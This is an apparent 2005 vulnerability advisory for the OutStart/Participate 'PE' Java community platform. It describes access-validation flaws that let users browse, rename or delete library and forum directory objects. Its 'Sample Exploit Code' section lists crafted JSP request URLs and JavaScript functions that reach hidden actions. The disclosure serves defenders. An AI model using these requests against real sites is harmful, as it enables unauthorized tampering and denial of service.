('binary' encoding is not supported, stored as-is)
--------------------------------------------------------
- Multiple Remote Access Validation Vulnerabilities
- With PE (community software)
--------------------------------------------------------
(Altrus::security.honour.ca)
Program name: PE
Versions affected: <unknown>
Vendor(s): Outstart Inc.
Participate Systems Inc.
Vendor Notification Date: 23 FEB 2005
Risk: Moderately Serious
Impact: Denial of Service, File Upload
Vendor Homepages: http://www.outstart.com
http://www.participate.com
---------------------------------------------------------
- Description
---------------------------------------------------------
PE is a proprietary java-based community that mimics the
functionality provided by existing open-source software.
It facilitates community forums, document libraries,
message boards, user interaction and an user management
infrastructure.
>From vendor site:
Available as either a hosted or installed solution,
OutStart Participate is improving the collaboration and
knowledge-sharing capabilities of many world-class
companies, including GE Healthcare, Caremark, palmOne,
Logitech, McGraw-Hill and Tivo. OutStart Participate
combines three different systems into one powerful
knowledge-sharing platform.
---------------------------------------------------------
- Discussion
---------------------------------------------------------
The software is affected by an Access Validation Error
that could allow a malicious users to rename or delete
critical directory objects. This could result in a denial
of service of all library, forum, and/or specialized
content until the directory objects were restored or
renamed appropriately.
The Vendor has been notified of this issue, and has
developed a patch. Sites and persons using the software
are advised to install the patch - available from the
vendor.
---------------------------------------------------------
- Sample Exploit Code
---------------------------------------------------------
http://www.targetsite.com/pe/repository/displaynavigator.jsp?rootFolder=101
-Allows an attacker to browse a limited directory tree (in this case, the action directory. Changing to "rootFolder=105" allows for the document library to be browsed.
http://www.targetsite.com/pe/repository/include/renamepopup.jsp?selectedObject=101
-Allows an attacker to rename the selected object ID (in this case, the action directory).
http://www.targetsite.com/pe/repository/displaydeletenavigator.jsp?selectedObjectsCSV=101
-Sets the object CSV for the delete navigator.
The following javascript commands might also be used to
call functions otherwise unavailable to the user:
showDeleteView()
showWebFolderView()
showLibraryView()
showMyLibraryView()
singleSelectObject(objid)
processRadioSelection(radio, objid)
processCheckboxSelection(chkbox, objid)
singleSelectObject(objid)
addToSelectedObjects(objid)
removeFromSelectedObjects(objid)
---------------------------------------------------------
- Solutions
---------------------------------------------------------
The vendor has provided a patch. Its effectiveness is
not confirmed, nor is its distribution.
---------------------------------------------------------
- References
---------------------------------------------------------
Authorative and updated copies of this vulnerability can
be found at:
http://security.honour.ca
---------------------------------------------------------
- Credits
---------------------------------------------------------
Discovered by: Altrus [root_at_honour.ca]
Received on Mar 08 2005
Intro
